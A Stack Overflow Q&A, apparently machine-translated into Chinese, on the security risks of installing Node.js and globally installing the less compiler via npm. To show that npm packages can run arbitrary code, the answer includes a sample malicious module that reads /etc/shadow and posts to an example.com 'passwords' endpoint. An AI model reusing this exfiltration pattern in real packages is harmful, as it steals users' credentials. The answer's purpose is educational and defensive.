这就是我问的原因:
为了在 Windows 下使用 lessc
编译器,我必须根据本指南安装 Node.js 和 NPM:http://lesscss.org/#getting-started
所以基本上,我只是:
- 从 http://nodejs.org/ 下载并安装 Node.js
- 使用
npm install -g less
运行并安装lessc
详细问题:
有什么我应该注意的安全隐患吗? Node.js 是否开放任何端口?它在后台运行吗?它会自动更新吗?
最佳答案
Are there any security implications I should be aware of?
是的,当然,正如 @seven-phases-max 在评论中指出的那样,风险是您运行不安全的脚本或执行任何您不想要的操作。
在上面,您在安装 less 时使用了 -g
(全局)标志,这意味着您在系统上以 super 用户(管理员)身份安装 less。正如已经解释过的here作者:@Explosion_Pills:“安装可以运行任意脚本,并且使用 sudo 运行它可能非常危险!”
据我所知每个人都可以在 npm 上发布 Node 模块,因此我可以发布一个模块并安装它,例如包含:
var request = require('request'),
fs = require('fs');
fs.readFile('/etc/shadow', 'utf8', function (err,data) {
if (err) {
return console.log(err);
}
request.post(
'http://www.example.com/passwords',
{ form: { key: 'value' } },
function (error, response, body) {
if (!error && response.statusCode == 200) {
console.log(body);
}
}
);
});
另请查看Node Security Project .
关于windows - 在 Windows 下安装 Node.js 是否有任何安全隐患?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/26928475/